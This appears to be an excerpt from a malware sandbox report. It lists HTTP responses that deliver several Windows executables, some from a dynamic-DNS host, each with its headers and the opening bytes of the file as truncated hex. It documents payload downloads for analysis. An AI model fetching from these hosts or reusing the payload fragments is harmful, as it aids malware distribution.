                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:54 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "6dde8-6288a270f12d2"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:55 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "1f3950-6288a27148177"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:57 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "3ef50-6288a27148177"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:57 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "13bf0-6288a2718985b"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:11:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:20:44 GMTETag: "48e600-62fa681877911"Accept-Ranges: bytesContent-Length: 4777472Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 8a 6d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 d8 34 00 00 ba 39 00 00 00 00 00 00 10 c6 00 00 10 00 00 00 70 67 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 40 c6 00 00 04 00 00 7d f1 48 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 d0 71 00 68 00 00 00 00 c0 70 00 bc 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 71 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 70 00 00 10 00 00 00 52 2b 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 0a 01 00 00 c0 70 00 00 20 00 00 00 62 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 71 00 00 02 00 00 00 82 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 36 00 00 e0 71 00 00 02 00 00 00 84 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 71 69 66 65 61 67 72 00 40 1d 00 00 c0 a8 00 00 38 1d 00 00 86 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6f 6c 61 63 61 6d 69 00 10 00 00 00 00 c6 00 00 06 00 00 00 be 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 c6 00 00 22 00 00 00 c4 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:11:09 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "10e436-6288a2718791b"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:11:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:53 GMTETag: "1d4c00-62fa693f1c20c"Accept-Ranges: bytesContent-Length: 1920000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 43 13 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 24 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 24 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 73 68 69 71 78 70 00 40 1a 00 00 f0 31 00 00 38 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 64 73 6d 6d 7a 78 00 10 00 00 00 30 4c 00 00 04 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
